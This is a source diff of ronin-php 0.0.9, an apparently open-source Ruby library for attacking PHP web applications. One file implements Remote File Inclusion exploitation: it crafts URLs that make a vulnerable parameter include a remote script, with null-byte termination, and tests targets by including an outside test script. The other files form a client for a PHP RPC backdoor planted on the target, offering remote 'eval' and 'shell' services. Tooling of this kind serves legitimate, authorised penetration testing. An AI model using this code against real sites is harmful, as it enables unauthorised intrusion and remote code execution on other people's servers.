ronin-php 0.0.9

data/lib/ronin/php/rfi/rfi.rb

@@ -0,0 +1,127 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+#++
+#
+
+require 'ronin/network/http'
+require 'ronin/extensions/uri'
+require 'ronin/formatting/digest'
+require 'ronin/chars'
+
+module Ronin
+  module PHP
+    class RFI
+
+      # Default URL of the RFI Test script
+      TEST_SCRIPT = 'http://ronin.rubyforge.org/dist/php/rfi/test.php'
+
+      # Prefix text that will appear before the random RFI challenge string
+      CHALLENGE_PREFIX = 'PHP RFI Response: '
+
+      # RFI vulnerable url
+      attr_reader :url
+
+      # RFI vulnerable query parameter 
+      attr_reader :param
+
+      # Whether to terminate the RFI script url with a null byte
+      attr_accessor :terminate
+
+      # URL of the RFI Test script
+      attr_accessor :test_script
+
+      #
+      # Creates a new RFI object with the specified _url_, _param_ and given
+      # _options_.
+      #
+      # _options may contain the following keys:
+      # <tt>:terminate</tt>:: Whether or not to terminate the RFI script url
+      #                       with a null byte. Defaults to +true+.
+      # <tt>:test_script</tt>:: URL of RFI test script. Defaults to
+      #                         TEST_SCRIPT.
+      #
+      def initialize(url,param,options={})
+        @url = url
+        @param = param
+
+        if options.has_key?(:terminate)
+          @terminate = options[:terminate]
+        else
+          @terminate = true
+        end
+
+        @test_script = (options[:test_script] || TEST_SCRIPT)
+      end
+
+      #
+      # Returns +true+ if the RFI script url will be terminated with
+      # a null byte, returns +false+ otherwise.
+      #
+      def terminate?
+        @terminate == true
+      end
+
+      #
+      # Builds a RFI url to include the specified _script_url_.
+      #
+      def url_for(script_url)
+        script_url = URI(script_url.to_s)
+        new_url = URI(@url.to_s)
+
+        new_url.query_params.merge!(script_url.query_params)
+        script_url.query_params.clear
+
+        script_url = "#{script_url}?" if terminate?
+
+        new_url.query_params[@param.to_s] = script_url
+        return new_url
+      end
+
+      #
+      # Include the specified RFI _script_ using the given _options_.
+      #
+      def include(script,options={})
+        options = options.merge(:url => url_for(script))
+
+        if options[:method] == :post
+          return Net.http_post_body(options)
+        else
+          return Net.http_get_body(options)
+        end
+      end
+
+      #
+      # Returns +true+ if the url is vulnerable to RFI, returns +false+
+      # otherwise.
+      #
+      def vulnerable?(options={})
+        challenge = Chars.alpha_numeric.random_string(10).md5
+
+        test_url = URI(@test_script.to_s)
+        test_url.query_params['rfi_challenge'] = challenge
+
+        response = include(test_url,options)
+        return response.include?("#{CHALLENGE_PREFIX}#{challenge}")
+      end
+
+    end
+  end
+end

data/lib/ronin/rpc/php.rb

@@ -0,0 +1,28 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+#++
+#
+
+require 'ronin/rpc/php/call'
+require 'ronin/rpc/php/client'
+require 'ronin/rpc/php/console'
+require 'ronin/rpc/php/shell'
+require 'ronin/rpc/php/rfi'

data/lib/ronin/rpc/php/call.rb

@@ -0,0 +1,45 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+#++
+#
+
+require 'ronin/rpc/call'
+require 'ronin/formatting/binary'
+
+require 'xmlrpc/client'
+
+module Ronin
+  module RPC
+    module PHP
+      class Call < RPC::Call
+
+        #
+        # Encodes the call and the given _session_ variables into a base64
+        # encoded XMLRPC call message.
+        #
+        def encode(session={})
+          XMLRPC::Create.new.methodCall(@name,session,*(@arguments)).base64_encode
+        end
+
+      end
+    end
+  end
+end

data/lib/ronin/rpc/php/client.rb

@@ -0,0 +1,152 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+#++
+#
+
+require 'ronin/rpc/php/call'
+require 'ronin/rpc/php/response'
+require 'ronin/rpc/php/console'
+require 'ronin/rpc/php/shell'
+require 'ronin/rpc/client'
+require 'ronin/network/http'
+
+module Ronin
+  module RPC
+    module PHP
+      class Client < RPC::Client
+
+        # URL of RPC server
+        attr_reader :url
+
+        # Proxy to send requests through
+        attr_accessor :proxy
+
+        # User-Agent string to send with each request
+        attr_accessor :user_agent
+
+        # Session data
+        attr_reader :session
+
+        # Provides a console service
+        service :console, Console
+
+        # Provides a shell service
+        service :shell, Shell
+
+        #
+        # Creates a new Client object with the specified _url_ and the
+        # given _options_.
+        #
+        # _options_ may contain the following keys:
+        # <tt>:proxy</tt>:: The proxy settings to use when communicating
+        #                   with the server.
+        # <tt>:user_agent</tt>:: The User-Agent to send to the server.
+        # <tt>:user_agent_alias</tt>:: The User-Agent alias to send to
+        #                              the server.
+        #
+        def initialize(url,options={})
+          @url = url
+
+          @proxy = options[:proxy]
+
+          if options[:user_agent_alias]
+            @user_agent = Web.user_agent_alias[options[:user_agent_alias]]
+          else
+            @user_agent = options[:user_agent]
+          end
+
+          @cookie = nil
+          @session = {}
+        end
+
+        def call_url(call_object)
+          new_url = URI(@url.to_s)
+          new_url.query_params['rpc_call'] = call_object.encode(@session)
+
+          return new_url
+        end
+
+        #
+        # Returns +true+ if the RPC server is running and responding to
+        # function calls, returns +false+ otherwise.
+        #
+        def running?
+          call(:running)
+        end
+
+        #
+        # Returns a finger-print of the PHP server.
+        #
+        def fingerprint
+          call(:fingerprint)
+        end
+
+        protected
+
+        #
+        # Creates a new Call object for the specified _funtion_ and
+        # _arguments_.
+        #
+        def create_call(function,*arguments)
+          Call.new(function,*arguments)
+        end
+
+        #
+        # Sends the specified _call_object_ to the RPC server. Returns
+        # a new Response object that represents the server's response.
+        #
+        def send_call(call_object)
+          resp = Net.http_get(:url => call_url(call_object),
+                              :cookie => @cookie,
+                              :proxy => @proxy,
+                              :user_agent => @user_agent)
+
+          new_cookie = resp['Set-Cookie']
+          @cookie = new_cookie if new_cookie
+
+          return Response.new(resp.body)
+        end
+
+        #
+        # Returns the return-value of a previous function call encoded
+        # into the specified _response_. If the _response_ contains
+        # a fault message, the fault exception will be raised.
+        #
+        def return_value(response)
+          status, params = response.decode
+
+          unless status
+            raise(params)
+          end
+
+          @session.merge!(params['session'])
+
+          if params.has_key?('output')
+            print(params['output'])
+          end
+
+          return params['return_value']
+        end
+
+      end
+    end
+  end
+end

data/lib/ronin/rpc/php/console.rb

@@ -0,0 +1,42 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+#++
+#
+
+require 'ronin/rpc/console'
+
+module Ronin
+  module RPC
+    module PHP
+      class Console < RPC::Console
+
+        #
+        # Evaluates the specified _string_ of PHP code and returns the
+        # result.
+        #
+        def eval(string)
+          call(:eval,string)
+        end
+
+      end
+    end
+  end
+end

data/lib/ronin/rpc/php/response.rb

@@ -0,0 +1,63 @@
+#
+#--
+# Ronin PHP - A Ruby library for Ronin that provides support for PHP
+# related security tasks.
+#
+# Copyright (c) 2007-2008 Hal Brodigan (postmodern.mod3 at gmail.com)
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation; either version 2 of the License, or
+# (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
+#++
+#
+
+require 'ronin/rpc/exceptions/response_missing'
+require 'ronin/rpc/response'
+
+require 'xmlrpc/client'
+
+module Ronin
+  module RPC
+    module PHP
+      class Response < RPC::Response
+
+        #
+        # Returns the default XML parser to use for parsing XMLRPC
+        # responses.
+        #
+        def Response.parser
+          @@parser ||= XMLRPC::XMLParser::REXMLStreamParser.new
+        end
+
+        def Response.parser=(new_parser)
+          @@parser = new_parser
+        end
+
+        #
+        # Decodes the XMLRPC response message embedded in the response
+        # from the server.
+        #
+        def decode
+          response = @contents[/<rpc>.*<\/rpc>/m]
+
+          unless response
+            raise(ResponseMissing,"failed to receive a valid RPC method response",caller)
+          end
+
+          return Response.parser.parseMethodResponse(response)
+        end
+
+      end
+    end
+  end
+end